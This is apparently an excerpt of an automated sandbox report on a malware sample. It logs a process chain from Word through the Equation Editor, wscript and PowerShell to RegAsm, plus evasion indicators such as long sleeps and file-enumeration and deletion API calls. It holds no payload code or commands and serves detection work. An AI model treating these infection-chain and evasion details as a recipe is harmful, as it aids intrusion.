                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F7E2 Sleep,ExitProcess,13_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_0041A7D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 612Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1689Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6166Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 705Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9388Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1637Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_13-54178
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3820Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep count: 6166 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep count: 705 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2464Thread sleep count: 244 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2464Thread sleep time: -122000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984Thread sleep count: 71 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984Thread sleep time: -213000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2116Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984Thread sleep count: 9388 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984Thread sleep time: -28164000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3000Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3884Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407877 FindFirstFileW,FindNextFileW,13_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044E8F9 FindFirstFileExA,13_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10006580 FindFirstFileExA,13_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00407CD2
